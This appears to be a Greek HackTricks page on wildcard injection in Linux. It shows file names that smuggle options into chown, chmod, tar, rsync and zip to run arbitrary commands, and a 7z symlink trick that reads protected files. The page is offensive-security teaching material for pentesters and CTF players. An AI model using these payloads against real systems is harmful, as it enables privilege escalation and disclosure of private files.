Wildcards Spare tricks

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

chown, chmod

Μπορείτε να υποδείξετε ποιον κάτοχο αρχείου και δικαιώματα θέλετε να αντιγράψετε για τα υπόλοιπα αρχεία

touch "--reference=/my/own/path/filename"

Μπορείτε να εκμεταλλευτείτε αυτό χρησιμοποιώντας https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (συνδυασμένη επίθεση) Περισσότερες πληροφορίες στο https://www.exploit-db.com/papers/33930

Tar

Εκτέλεση αυθαίρετων εντολών:

touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"

Μπορείτε να εκμεταλλευτείτε αυτό χρησιμοποιώντας https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (επίθεση tar) Περισσότερες πληροφορίες στο https://www.exploit-db.com/papers/33930

Rsync

Εκτέλεση αυθαίρετων εντολών:

Interesting rsync option from manual:

-e, --rsh=COMMAND           specify the remote shell to use
--rsync-path=PROGRAM    specify the rsync to run on remote machine
touch "-e sh shell.sh"

Μπορείτε να εκμεταλλευτείτε αυτό χρησιμοποιώντας https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (επίθεση rsync) Περισσότερες πληροφορίες στο https://www.exploit-db.com/papers/33930

7z

Ακόμα και χρησιμοποιώντας -- πριν από * στο 7z (σημειώστε ότι το -- σημαίνει ότι η επόμενη είσοδος δεν μπορεί να θεωρηθεί ως παράμετρος, οπότε απλώς αρχεία διαδρομών σε αυτήν την περίπτωση) μπορείτε να προκαλέσετε ένα αυθαίρετο σφάλμα για να διαβάσετε ένα αρχείο, οπότε αν μια εντολή όπως η παρακάτω εκτελείται από τον ριζικό χρήστη:

7za a /backup/$filename.zip -t7z -snl -p$pass -- *

Και μπορείτε να δημιουργήσετε αρχεία στον φάκελο όπου εκτελείται αυτό, μπορείτε να δημιουργήσετε το αρχείο @root.txt και το αρχείο root.txt να είναι ένα symlink προς το αρχείο που θέλετε να διαβάσετε:

cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt

Στη συνέχεια, όταν εκτελείται το 7z, θα θεωρήσει το root.txt ως ένα αρχείο που περιέχει τη λίστα των αρχείων που πρέπει να συμπιεστούν (αυτό υποδηλώνει η ύπαρξη του @root.txt) και όταν το 7z διαβάσει το root.txt, θα διαβάσει το /file/you/want/to/read και καθώς το περιεχόμενο αυτού του αρχείου δεν είναι μια λίστα αρχείων, θα εμφανίσει ένα σφάλμα εμφανίζοντας το περιεχόμενο.

Περισσότερες πληροφορίες στα Write-ups του CTF από το HackTheBox.

Zip

Εκτέλεση αυθαίρετων εντολών:

zip name.zip files -T --unzip-command "sh -c whoami"
Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Last updated